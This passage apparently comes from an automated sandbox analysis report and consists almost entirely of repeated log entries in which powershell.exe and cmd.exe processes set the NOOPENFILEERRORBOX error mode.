                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
